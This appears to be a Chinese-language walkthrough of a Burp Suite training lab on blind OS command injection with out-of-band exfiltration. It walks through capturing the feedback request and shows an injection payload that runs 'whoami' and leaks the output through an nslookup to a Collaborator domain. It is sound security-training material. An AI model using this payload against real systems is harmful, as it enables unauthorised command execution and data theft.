bp官方靶场OS command injection（操作系统命令注入）漏洞5

第五关 带外数据泄露的盲注操作系统命令注入

这一关就是操作系统命令注入的盲注+带外数据泄露结合，获取到用户名信息

提示：1、在反馈函数中包含一个盲作系统命令注入漏洞

2、应用程序执行包含用户提供的详细信息的 shell 命令。服务端命令是异步执行的，对应用程序的响应没有影响。无法将输出重定向到您可以访问的位置。但是可以触发与外部域的带外交互

具体操作：

1、反馈内容随便写一下，然后提交，触发相关功能数据包（操作见第三关）

2、找到触发的数据包，发往repeater

先去burp Collaborator复制子域（操作见第三关）

然后把子域插入到操作系统命令注入的盲注的语句中：

||nslookup+`whoami`.266gu9jotiz6okq3v4c5zyiscjia63us.oastify.com||
​

然后我们回到burp，查看有回显没，带外信息泄露

用户名：peter-68cQT3

3、回到页面输入用户名

4、如图输入用户名后，靶场过关